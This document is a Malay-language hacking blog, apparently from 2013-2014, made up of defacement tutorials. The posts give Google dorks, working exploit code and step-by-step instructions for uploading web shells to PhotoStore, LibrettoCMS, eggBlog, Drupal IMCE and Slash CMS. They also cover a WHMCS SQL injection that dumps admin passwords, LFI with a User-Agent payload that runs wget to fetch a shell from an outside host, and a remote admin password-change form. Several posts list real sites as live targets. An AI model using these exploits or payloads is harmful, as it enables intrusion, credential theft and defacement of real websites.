Showing posts with label Deface. Show all posts
Showing posts with label Deface. Show all posts

Tuesday, 14 January 2014

PhotoStore Shell Upload Deface


Assalamualaikum dan salam sejahtera. harini aku nak share exploit webapps yang boleh upload shell. lepas tu korang boleh deface.

Webapps yang terdedah kepada vulnerablility ini ialah PhotoStore.
ok jom..


1. Mula-mula korang cari website target guna google dork. cara guna google dork korang copy dan paste dork dibawah kat google. nnti keluar web yg terdedah kepada exploit ini.

Dork : "Powered By PhotoStore"


Lepas tu pilih mana-mana website.

2. Sekarang korang perlu copy code exploit dibawah.

<?php
 
$uploadfile="ip.php";
$ch = curl_init("http://target.com/assets/uploadify/old/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
print "$postResult";
?>
 

Korang copy dan paste di dalam notepad. 
sekarang korang tengok di dalam code yang korang copy tadi. ada link kan? tukar "target.com" kepada website yang korang dapat dari google dork tadi.

Kemudian save as :
File name : exploit.php

Save as type : All files

3. Sekarang korang upload masuk ke webhosting. boleh register free di x90x.net atau hostinger.my

Kemudian korang juga perlu upload shell ke dalam webhosting korang tu. pastikan shell tu terletak di dalam direktori yang sama dengan file exploit.shell korang mesti nama "shell.php"

Jadi dalam webhosting korang akan ada dua file, iaitu "exploit.php" dan "shell.php" .

4. Baiklah sekarang semua dah siap, korang boleh guna exploit ni dengan menjalankan script exploit.php tadi.
http://link-hosting-korang/exploit.php


5. Kemudian untuk kalau berjaya upload shell, shell akan berada di root direktory. contoh :

http://target.com/shell.php


Baiklah semoga berjaya!

Live target :
photocity.co.za
www.rogueeventdigitals.co.uk
www.saladeprensa.co/
www.stockthatphoto.co.uk/
photokaya.com/ip.php


Read More

Sunday, 1 December 2013

Tutorial Install OWASP Joomla Vulnerability Scanner di Windows


Assalamualaikum dan salam sejahtera.Entry kali ini aku nak share cara nak install OWASP Joomla Vulnerability Scanner atau Joomscan di Windows.

Tool ini adalah untuk scan kelemahan yang terdapat di dalam sesebuah website Joomla seperti 0day, exploit dan lain2... 

Tool ini Linux pun boleh guna. Caranya sama saja tapi tak perlu install Perl sebab Linux dah tersedia ada.

Ok jom..

1. Tool ini ditulis dalam bahasa Perl. Jadi korang perlu Perl untuk jalankan tool ini. Download Active Perl :

Download Link: http://www.activestate.com/activeperl/downloads


lepas download, install.

2. Download pula OWASP Joomla Vulnerability Scanner dan extract.

Download Link: http://sourceforge.net/projects/joomscan/files/latest/download


Aku cadangkan korang extract ke desktop.Rename folder yg korang extract jadi joomscan. 
Kemudian copy folder joomscan ke Drive C:/ untuk senang guna.

Gambar :




3. Sekarang korang buka CMD (Command Prompt). cara nya tekan Start, kemudian taip CMD di kotak search :



4. Lepas tu CMD akan terbuka. Sekarang korang kena pergi ke directory joomscan yg korang extract tadi. cara nya dengan menggunakan command CD.

Taip di CMD :

cd C:\joomscan

kemudian tekan Enter. korang sekarang akan ada dalam folder joomscan. 
Gambar :



5. Sekarang semua dah ready, kita dah boleh guna Joomla scanner ni. Caranya :

Taip command :

perl joomscan.pl


Tekan Enter! 

tunggu sekejap untuk loading. Kalau berjaya, korang akan dapat macam ni :



Siap!
note : kalau keluar access denied, korang tutup antivirus dulu.


6. Cara nak guna Joomla Scanner ni :

taip command :
 perl joomscan.pl -u http://target.com/ 

gantikan http://target.com/ tu dengan laman web yang korang nak scan. 



INGAT! tool ni untuk scan JOOMLA sahaja.


Baiklah sampai sini saja tutorial ini. Selamat mengguna :)




Read More

Wednesday, 31 July 2013

Hack Laman Web dengan telefon pintar Android!


Assalamualaikum dan salam sejahtera.Hari ini aku nak ajar korang cara nak hack atau godam laman web dengan hanya menggunakan telefon pintar android.

Penggodaman ini dilakukan dengan kaedah SQL Injection.
Untuk ini kita akan menggunakan satu aplikasi android iaitu Droidsqli.

Apa yang diperlukan :

1. Aplikasi Droidsqli - Download Droidsqli


2. Laman web yang vulnerable terhadap SQL Injection.
Korang boleh cari web vuln dengan Google Dork.

3. Telefon pintar android.Apa2 jenis pun boleh asal android.


Droidsqli adalah aplikasi pertama untuk telefon pintar android yang mampu menjalankan serangan Sql Injection secara automatik.


Droidsqli mempunyai serangan seperti :

- Time based injection

- Blind injection

- Error based injection

- Normal injection



Cara menggunakan :

Cara menggunakan Droidsqli adalah sangat mudah. 

1. Korang cuma perlu masukkan url laman web target ke kotak "Target URL".

2. Kemudian tekan "Inject".




3. Droidsqli akan menyerang secara automatik dan apabila berjaya, Droidsqli akan memaparkan table-table di dalam database website target.

4. Korang kemudian boleh membuka table2 tersebut untuk mendapatkan data penting seperti Username dan Password.

Bagi yang masih belum faham boleh tengok video dibawah :




Baiklah itu saja untuk tuto kali ini.mudah kan?
Terima kasih kepada sumber asal iaitu Devil's Cafe



Read More

Sunday, 28 July 2013

Shell and Backdoor Scanner by PHC Team

Assalamualaikum dan salam sejahtera.Hari ini aku nak share tool terbaru dari PHC Team iaitu tool Shell Scanner.
Fungsi tool ini adalah untuk mengimbas atau scan sesuatu website untuk mencari shell atau backdoor.






Download :

Mirror 1: http://file.my/files/2oSWJ41374850591.html
Mirror 2: http://www.uploadmb.com/dw.php?id=1374850530
Mirror 3: http://www.filehostfree.com/?d=51F28F121


Virus scan :


Cara nak guna :

1. Download dan buka tool Shell Scanner.

2. Masukkan url website target di kotak "Website URL".

3. Kemudian click "Start" dan tool ini akan mula scan website target korang.

4. Hasil akan dipaparkan di dalam kotak di bawah seperti dalam gambar.

5. Kalau korang rasa nak tambah wordlist korang seniri, korang boleh letak file wordlist korang di dalam drive C:/
kemudian letak nama file korang di kotak File Name dan click Load Wordlist.



Read More

Tuesday, 18 June 2013

Remote Code Execution Deface Tool by PHC Team

Assalamualaikum dan salam sejahtera.Hari ni aku nak share satu tool menarik untuk deface.

Tool ni adalah Remote Code Execution oleh PHC Team.
Tool ini boleh mengupload shell ke dalam vulnerable website .

Apa yang diperlukan :

- Remote Code Execution Deface Tool :

DOWNLOAD!

Mirror

Virus Scan

Jangan risau tool ni 100% bebas virus dan keylogger.
Ok bila dah ada tool tu jom mula...

Cara mencari vulnerable website :

Korang boleh cari site vuln dengan google dork :
- inurl:/uploadify/uploadify.php 

- inurl:/wp-content/themes/qualifire

Untuk exploit tambah kan exploit di url site : 

http://site.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

Cara nak guna :


Sebelum Guna

Berjaya inject!


1. Start button untuk memulakan operasi ke atas tool .

2. Choose file button untuk memilih file anda untuk diupload .

3. Kotak kosong untuk meletakkan url website yang vulnerable.Contoh url rujuk cara mencari vuln website di atas.

4. Satu text akan muncul dibawah progress bar selepas button start ditekan .

5. Dir bagi shell yang di upload di website ialah :

/public_html/ 

contoh 

www.site.com/shell.php


Jika shell tidak muncul bermakna website tidak vulnerable untuk diinject atau invalid file type .
Korang boleh menukar nama shell menjadi "shell.php.jpeg" untuk bypass masalah invalid file type .

Ok itu saja.semoga korang berjaya! Credit to PhcTeam.
Read More

Sunday, 16 June 2013

LibrettoCMS 2.2.2 File Upload Deface



Assalamualaikum dan salam sejahtera.Hari ini aku nak ajar exploit deface.Exploit ni terdapat pada LibrettoCMS 2.2.2.
Korang boleh upload shell php atau file deface html korang.

1. Mula-mula cari website dengan google dork :


- "Powered By Libretto CMS"

- inurl:/PGRFileManager.php


2. Buka website mana2 yang korang dapat dan tambah url ni:

/adm/ui/js/ckeditor/plugins/pgrfilemanager/PGRFileManager.php


Contoh :

http://www.site.com/adm/ui/js/ckeditor/plugins/pgrfilemanager/PGRFileManager.php


3. Kemudian akan keluar macam ni :



4. Kemudian korang click dekat anak panah warna Hijau kat tepi Files tu.Pilih shell php korang.tapi rename shell tu jadi shell.doc .

Lepas tu upload! lepas dah upload korang cari nama shell korang tadi dalam file manager tu.Kemudian rename pulak jadi shell.php .


Shell korang akan hilang dalam file manager tu.tapi sebenarnya masih ada :D

5. Untuk tengok hasil :

http://www.site.com/userfiles/shell.php


Itu saja! siap....selamat ber-deface...

Live target :
http://9floor.pl/js/libraries/ckeditor/plugins/pgrfilemanager/PGRFileManager.php
http://www.thegioibaochi.com/admin/ckeditor/plugins/pgrfilemanager/PGRFileManager.php


Read More

Wednesday, 5 June 2013

Hack WHMCS Dengan SQL Injection


Assalamualaikum dan salam sejahtera.Entry hari ni aku nak ajar korang cara nak hack WHMCS dengan SQLi. Vulnerable ni terdapat pada WHMCS 4.x .

WHMCS? WHMCS ni adalah WHMCompleteSolution dimana selalunya webapps ni digunakan untuk laman jual beli seperti laman web hosting dan domain.
Ok jom!

1. Mula-mula cari website vuln dengan dork :

- intext:"Powered by WHMCompleteSolution"


- inurl:"submitticket.php‎"‎

- inurl:dl.php?type=

2. Lepas dah dapat satu website masa untuk inject.Contoh aku dapat laman web ni :

http://www.powermailings.com/billing/dl.php?type=d&id=1

String untuk kita inject :

and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --


Sekarang tambah string tu di hujung nombor id url website tu.contoh :

http://www.powermailings.com/billing/dl.php?type=d&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --

Lepas tu Enter!
Bila kita inject ni, kalau berjaya browser kita akan download satu file format .pdf .dalam file ni adalah Username dan Password WHMCS tu :D

3. Untuk login :
http://www.target.com/path/admin


contoh :
http://www.powermailings.com/billing/admin
Ok itu saja untuk tutorial kali ni.enjoy...


Read More

Tuesday, 28 May 2013

ExtCalendar 2 SQL Injection Vulnerability


Assalamualaikum dan salam sejahtera.Hari ini aku nak ajar exploit sql injection.Exploit ni sebenarnya dah lama tapi website baru masih menggunakan webapps ExtCalendar 2 ni.Jadi banyak lagi website yang ada hehe..

Ok Jom mula.

1. Cari website dengan google dork :
inurl:calendar.php?mode=cat

"ExtCalendar 2"

2. Pilih salah satu website.Vuln :

http://www.site.com/[PATH]/calendar.php?mode=cat&cat_id=[SQLi]


3. Korang boleh inject manual atau guna havij.

4. Bila korang dah berjaya inject, login page :

http://www.site.com/[PATH]/login.php


Lepas dah login korang edit la event dan letak code html korang! siap!

Live site :


http://www.el-eaga.com/calendar/calendar.php?mode=cat&cat_id=2
http://www.notebox.ca/ggmss/calander/calendar.php?mode=cat&cat_id=6
http://fassurvival.com/calendar/calendar.php?mode=cat&cat_id=2

banyak lagi kat google :P

Read More

Monday, 27 May 2013

Hacking LFI/RFI Dengan Fimap


Assalamualaikum dan salam sejahtera.Entry hari ini aku nak ajar korang cara nak hack dan pentest website dengan menggunakan tool yang bernama Fimap. Fimap ni sebenanrnya tool scanner yang ditulis dalam bahasa programming Python untuk teknik hacking Local File Inclusion (LFI) dan Remote File Inclusion (LFI).

Bagi yang belum tahu lagi kaedah hacking laman web RFI dan LFI ni boleh rujuk artikel terdahulu :

RFI : Tutorial RFI - Remote File Inclusion

LFI : Upload Shell dan Deface dengan LFI

Baiklah dalam tutorial ni aku akan tunjuk step-step menggunakan tool Fimap ni.Fimap ni boleh digunakan dalam Windows atau Linux.Dalam tutorial ni aku akan menggunakan Ubuntu 13.04.

Apa yang diperlukan :


1. Tool Fimap : https://code.google.com/p/fimap/downloads/detail?name=fimap_alpha_v09.tar.gz&can=2&q=


(Untuk windows sahaja ) :
Python : 
http://www.python.org/download/

note :Untuk pengguna Windows korang kena download Python dan Fimap.Untuk pengguna Linux korang cuma perlu download Fimap sahaja.

note2 : Untuk pengguna Backtrack, korang tak perlu download apa-apa.Semua dah siap ada.

2. Selepas dah download, install python ( windows) dan extract file fimap.Untuk memudahkan kerja, rename folder fimap tu dari fimap_alpha_v09 kepada fimap.


3. Selepas tu "cd" ke dalam folder fimap tersebut.Untuk windows aku cadangkan letak dalam drive C:/
dan untuk Linux aku cadangkan letak dalam Home.

Windows :
Buka cmd dan masukkan command :
cd C:/fimap

Linux :

Buka Terminal dan masukkan command :
cd fimap


Untuk Backtrack masukkan command :
cd /pentest/web/fimap

4. Baiklah sekarang masanya untuk kita mula menggunakan tool Fimap ni.Aku akan paparkan commands untuk fimap.Commands ni boleh digunakan pada Windows dan Linux.Untuk windows pastikan korang dah install python dan pastikan dah cd folder fimap.

Baiklah dibawah aku senaraikan commands yang korang perlu tahu :

Scan Sesuatu Laman Web Untuk Vulnerable RFI/LFI :



./fimap.py -u http://www.example.com/test.php?file=bang&id=23






Search Google untuk laman web yang vulnerable kepada RFI/LFI dengan Google Dork :


./fimap.py -g -q inurl:include.php




note: gantikan inurl:include.php dengan google dork RFI/LFI korang.

Mencari dan mengeluarkan list url yang vuln RFI/LFI dalam sesuatu laman web :


./fimap.py -H -u 'http://www.example.com' -d 3 -w /tmp/urllist





Ni antara commands basic yang korang perlu tau untuk menggunakan tool fimap ni.Nak lagi?
Boleh rujuk commands penuh di laman rasmi fimap : 

FimapHelpPage

Baiklah itu saja untuk tutorial ni.semoga korang berjaya!

Read More

Friday, 17 May 2013

Joomla Component com_shohada LFI Vulnerability


Assalamualaikum dan salam sejahtera.Entry hari ini aku nak share exploit joomla component com_shohada. component joomla ini terdedah kepada serangan Local File Inclusion atau LFI.

Ok jom..

1. Mula-mula cari website sasaran dengan google dork.(copy dan paste dekat google).


Dork : inurl:com_shohada


2. Kemudian pilih mana2 website yang korang nak.
Ok aku dah dapat satu website : 

http://gorgab.com/index.php?option=com_shohada&view=shohada

3. Sekarang gantikan url laman web korang tu dengan :

index.php?option=com_shohada&controller=

Jadi website tadi akan jadi :http://gorgab.com/index.php?option=com_shohada&controller=

4. Sekarang masa untuk kita serang guna LFI.
Tempat korang nak serang tu :

http://gorgab.com/index.php?option=com_shohada&controller=[LFI DI SINI]


Kemudian masukkan exploit :
http://gorgab.com/index.php?option=com_shohada&controller=../../../../../../../../../../etc/passwd

Tengok yang BIRU tu exploit LFI.kalau tak jadi, buang dihujung tu.Kalau tak jadi jugak maksudnya web tu tak vulnerable.

Rujuk gambar :


Ni maksudnya website tu vulnerable! Sekarang korang boleh lah upload shell guna User-Agent.

Tutorial upload shell LFI tengok di sini : 
Upload Shell Dan Deface dengan LFI

Ok itu saja Assalamualaikum!

Read More

Tuesday, 14 May 2013

eggBlog 4.1.2 - Arbitrary File Upload Deface

Assalamualaikum dan salam sejahtera. Entry hari ni aku nak share exploit cms eggBlog.Exploit ni korang boleh upload file macam shell dan deface.

1. Google Dork :
"powered by eggBlog.net"


2. Buka mana2 web yang korang dapat kat google, dan tambah kat hujung url :
/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

contoh korang dapat http://site.com/


Tukar ke :


http://site.com/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=


3. Kemudian korang akan nampak lebih kurang macam ni :


Ok bila dah keluar macam ni, tekan choose file dan pilih la shell korang! shell tu korang kena rename jadi shell.php.jpg .


Lepas tu tekan Upload :D

note1 : main2 dengan extension file untuk upload.hehe
note2: 
Kalau tak keluar mcm ni maksudnya web tu x vuln.cari web lain.

4. Lepas dah upload shell, untuk tengok hasil korang cari nama shell korang kat tepi tu dan click.Nanti akan ada keluar link shell korang tu dekat kotak image url.rujuk gambar :



Ataupun tukar kat hujung url :

/photos/uploads/shell.php.jpg

Ok siap! happy defacing...

Live demo :http://www.knallkopf.ch/blog/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
http://www.mrcromwellsattic.com/blog/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

Incoming Search Terms :
eggblog eggblogg eggblog themes powered by eggblog
Read More

Thursday, 25 April 2013

Free Monthly Websites 2.0 Administrator Remote Password Change

Deface website dengan remote password change

Assalamualaikum dan salam sejahtera.Hari ni aku nak ajar exploit baru iaitu remote administrator password change.Benda apa ni?
Exploit ni boleh tukar password dan username pada website yang terdedah secara remote.

Ok jom mula.

1. Mula-mula jadi laman sasaran dengan menggunakan salah satu google dork dibawah :


- inurl:/index_ebay.php

- "Powered by: Resell Rights Fortune"
- Powered By: Free Monthly Websites 2.0

2. Copy script dibawah :

Tukar http://www.target.com/ kepada link laman sasaran yang korang dapat tadi.


<html>

        <head><title>Free Monthly Websites 2.0 | Remote Admin password Change</title></head>
    <body>
            <td width="645" align="center" valign="top"><table width="645" border="0" align="center" cellpadding="0" cellspacing="0">
            <form name="frm" action="http://www.target.com/admin/file_io.php" method="post" onSubmit="return chk()">
            <input type="hidden" name="do_type" value="admin_settings_write">
        <tr>
            <td height="100" colspan="2" align="center" valign="middle">
            <font color="#808080"><b><font size="5">Free Monthly Websites 2.0 |</font><font size="6"> </font></b> <font size="4">Remote Admin password Change</font></font></td>
        </tr>
        <tr>
            <td width="300" height="50" align="center" valign="middle">
            <font color="#808080">New Username:</font>
            </td>
            <td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40">  </td>
        </tr>
            </td>
        <tr>
            <td width="300" height="62" align="center" valign="middle">
            <font color="#808080">New Password: </font> </td>
            <td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40">  </td>
        </tr>
        <tr>
            <td height="50" colspan="2" align="center" valign="middle" ><p>
            <input type="submit" name="Submit" value="Save" style="font-weight: 700"><br>
            </td>
        </tr>
        <tr>
            <td height="50" colspan="2" align="center" valign="middle" class="main2"><p>Author<b> : </b>
                <a href="http://www.y-aboukir.info/" style="text-decoration: none">
                <font color="#000000">Yassin ABOUKIR</font></a></p></td>
        </tr>
    </body>
<html>




Save sebagai exploit.html .

3. Selepas itu, buka script yang korang save tadi dalam browser korang. (right click > open with > browser)


Isikan kotak New Username dan New Password dengan apa2 yang korang suka.Username dan Password yang korang isi ni akan digunakan untuk login di website sasaran korang.

Selepas dah isi, click Save dan kalau berjaya korang akan di redirect ke login page website sasaran korang tadi :D




Apa yang korang perlu buat seterusnya ialah Login dengan username dan password yang korang buat tadi!

Kalau tak berjaya, akan keluar :
The file settings/admin_settings.txt is not writable

Lepas dah berjaya login, korang boleh la deface :D

Ni contoh website yang aku dapat :


http://www.jerry-lyons.com/page.php?id=Top_Reasons.html
http://zone-h.org/mirror/id/19689275

http://www.windowmagic.co/
http://zone-h.org/mirror/id/19689294

Korang boleh la mencuba dengan website2 ni.Happy defacing!
Read More

Monday, 1 April 2013

Upload Shell dan Deface dengan LFI


Assalamualaikum dan salam sejahtera.Hari ini aku nak buat tuto cara nak upload shell dan deface website dengan LFI atau nama penuhnya Local File Inclusion.
Ok jom mula..

1. Mula-mula cari website target.Dork boleh dapatkan di :
http://pastebin.com/rKWHFHVT


2. Lepas dah dapat web target kita kena test pulak.
Katakan lah url web tu macam ni :



http://www.website.com/view.php?page=contact.php

untuk test vuln ke tak, kita buat macam ni :

http://www.website.com/view.php?page=../

tambah ../ kat hujung tu.Kalau vuln, kita akan dapat error :


Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/reaperz/public_html/website.com/view.php on line 1337


Kemungkinan besar web tu vuln LFI.Jom kita test lagi.
Kali ni kita nak cari etc/passwd pulak.
buat macam ni :


http://www.website.com/view.php?page=../etc/passwd

Kita dapat error lagi dan tak ada etc/passwd
Jadi kita naik lagi directory lain.cara nya tambah ../ kat depan



http://www.website.com/view.php?page=../../../etc/passwd


Tambah ../ sampai jumpa etc/passwd
Kalau berjaya kita akan dapat macam ni :


root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin


Yes! tu maksudnya web tu vulnerable kepada LFI.

3. Sekarang masa untuk tengok samaada directory proc/self/environ dapat diakses atau tidak.


Caranya gantikan etc/passwd tadi dengan  proc/self/environ .
Contoh :


http://www.website.com/view.php?page=../../../proc/self/environ

Kalau boleh diakses korang akan dapat error macam ni :

DOCUMENT_ROOT=/home/reaperz/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=

Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80

Kalau keluar kosong ja, tak ada tulis macam ni, maksudnya direktory proc/self/environ tak dapat diakses ataupun OS yang digunakan ialah FreeBSD.

4. Sekarang masanya untuk kita inject shell kedalam proc/self/environ. Caranya ialah dengan inject code kita melalui User-Agent HTTP Header.

Kita boleh guna add-on Tamper Data yang boleh didapati dalam Mozilla Firefox untuk inject code kita.

Buka Tamper Data dalam firefox (alt+T &gt; Tamper Data).Kemudian click Start Tamper.



Selepas itu buka website target :

http://www.website.com/view.php?page=../../../proc/self/environ

Kemudian akan keluar popup.




Tick Continue Tampering dan click Tamper.Kemudian akan keluar popup lagi :




Isi kotak User-Agent dengan code :

<?system(‘wget http://shell.reaperz.net/wso.txt -O shell.php’);?>


Kemudian click OK.
Kalau berjaya shell.php akan dihasilkan dalam directory website target kita tadi.

Sekarang masa untuk access shell kita tadi :


http://www.website.com/shell.php


Kalau berjaya shell yang kita inject tadi akan ada.
Itu saja cara untuk upload shell dengan LFI.

Selamat berjaya!


Read More

Wednesday, 27 March 2013

Slash CMS Multiple Vulnerability


Assalamualaikum dan salam sejahtera.Kali ini aku nak ajar korang deface website dengan exploit Slash CMS.webapps ini terdedah kepada multiple vulnerability iaitu Remote File Upload, XSS dan SQLi.

Ok jom mula~

Google Dork :

"Slash CMS"
@
inurl:slash-cms

note: korang reka sendiri dork ;)

Remote File Upload

1. Korang buat satu file upload.php dan upload ke dalam free hosting atau mana2 saja.
code :



<form action="http://www.target.com/slash-cms/core/plugins/ajaxupload/ajaxupload.php" method="post" enctype="multipart/form-data">
<input type="file" name="sl_userfile">
<input type="submit" value="Upload"></form>
Uploaded File Path: /tmp/{Filename}.php


Gantikan www.target.com kepada link target website korang.



Nak tengok shell :
www.target.com/tmp/shell.php



XSS
http://www.target.com/slash-cms/index.php?mod=sl_pages&id=<script>alert(1)</script>


SQL Injection
http://www.target.com/slash-cms/index.php?mod=sl_pages&id=[SQLI]

Contoh:http://www.target.com/slash-cms/index.php?mod=sl_pages&id=-2+union+select+1,2,user(),database(),5,6



Itu saja exploit kali ini..Happy defacing...
Read More

Thursday, 14 March 2013

Reaperz.NET Shell Archive


Assalamualaikum dan salam sejahtera.Hari ni aku nak share satu website yang aku baru buat kelmarin.Iaitu website Shell Archive.

Web ni aku buat untuk letak shell-shell asp dan php.Jadi senang lah korang nak cari shell apa2....cari satu tempat je :D

Dalam web ni ada PHP dan ASP Shell.
Yang sepesialnya selain korang boleh copy paste shell2 ni, korang jugak boleh guna direct untuk RFI :P
Aku akan update dari masa ke semasa bila ada shell baru.Kalau korang ada shell yang tak ada dalam web ni korang boleh PM aku suruh tambah hehe ^.^

Ok jom terjah!

Read More

Tuesday, 12 March 2013

Shell Symlink_Sa 3.0

Assalamualaikum dan salam sejahtera,entry hari ini aku nak share shell Symlink_Sa 3.0. Shell ini dibuat oleh Sec-w.com.
Kegunaan shell ni? Symlink la! haha...tapi ada banyak function lagi ;)

Features :
-> Symlink Bypass
-> Bypass Read
-> Mass Joomla Symlink
-> Masswordpress SymlinkMass
-> vBulletin Symlink
Dan banyak lagi.


SS :



Dapatkan sekarang!
http://pastebin.com/1ttQTiZQ
Mirror : 

http://site.reaperz.net/txt/symlink_sa30.txt

Cara guna :
1. Copy code dan paste dalam notepad.Save as symlink.php.
2. Upload masuk website dan symlink!
Read More

Monday, 11 March 2013

Drupal IMCE Mkdir Remote File Upload

Deface dengan exploit drupal deface


Assalamualaikum dan salam sejahtera.Dah lama aku tak buat post exploit deface kan? Ok hari ini aku nak ajar korang satu exploit deface di bawah platform Drupal.

Sebenarnya exploit ni dah lama tapi masih banyak website yang terdedah kepada exploit ni termasuk web yang baru-baru :D

OK jom mula~

1. Mula-mula cari web vuln dengan google dork :
inurl:"/imce?dir="
intitle:"File Browser"


note : ubah2 dork untuk dapat bnyak web :D

2. Kemudian buka website yang korang dapat dari google.

Akan keluar paparan macam ini :



Ok korang tengok di sebelah kiri web tu, ada folder2.Korang boleh ubah nak upload masuk folder mana.Tapi lebih baik ambil folder yang atas sekali iaitu files.


atau tukar hujung link website jadi /imce?dir=.

3. Kemudian klik UPLOAD dan pilih la file shell korang!
Extension yang dibenarkan : .php/.html/.pgs/.asp/shell.asp;me


Extension ni bergantung kepada website.ada yang boleh ada yang tak boleh.Korang tukar2 nama shell untuk bagi lepas :D

4. Selepas dah berjaya upload, untuk tengok hasil macam ni :

http://target.com/files/shell.php

http://target.com/path/shell.php

note : /path/ tu ikut kepada website.dia lain2 nama dia.ada yang tak ada dan ada yang ada.


Ok ini hasil yang aku dapat :

http://astronutrition.com/blog/files/reaperz.html
Mirror :
http://legend-h.org/deface.php?id=858072

Live Target :
http://astronutrition.com/blog/imce?dir=.

http://www.arcireal.com/imce?dir=.
http://www.worldagroforestry.org/imce?dir=.

dan banyak lagi kat google :D


Ok sampai sini saja tutorial kali ini.semoga berjaya depes...



Read More

Sunday, 10 March 2013

Tutorial Bypass Symlink Forbidden


Assalamualaikum dan salam sejahtera.Entry hari ini aku nak ajar cara nak bypass symlink forbidden.mesti korang pernah dapat symlink penat2, tiba2 bila nak bukak file config tu keluar forbidden kan?
Macam ni :  




Mesti bengang gila la hahaha..ok jangan risau jom aku ajar cara nak bypass :)

1. Mula-mula buat satu file php.ini .
Copy code dibawah :



safe_mode=OFF
disable_functions=NONE

Lepas tu paste dalam notepad dan save as 

name : php.ini
File type : all file

2. Kemudian kita buat file .htaccess .
Copy code dibawah :

Options FollowSymLinks MultiViews Indexes ExecCGI

Paste dalam notepad dan save as
name : .htaccess
File type : all file

3. Seterusnya korang cuma perlu upload ke dalam directory yang ada file config symlink korang tadi.Upload guna shell la xD
Dengan ini symlink korang akan di-bypass :D

Kalau tak berjaya, upload dekat directory public_html :D

Itu saja step dia...senang kan? selamat berjaya!
Makan symlink sampai kenyang :P


Read More

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com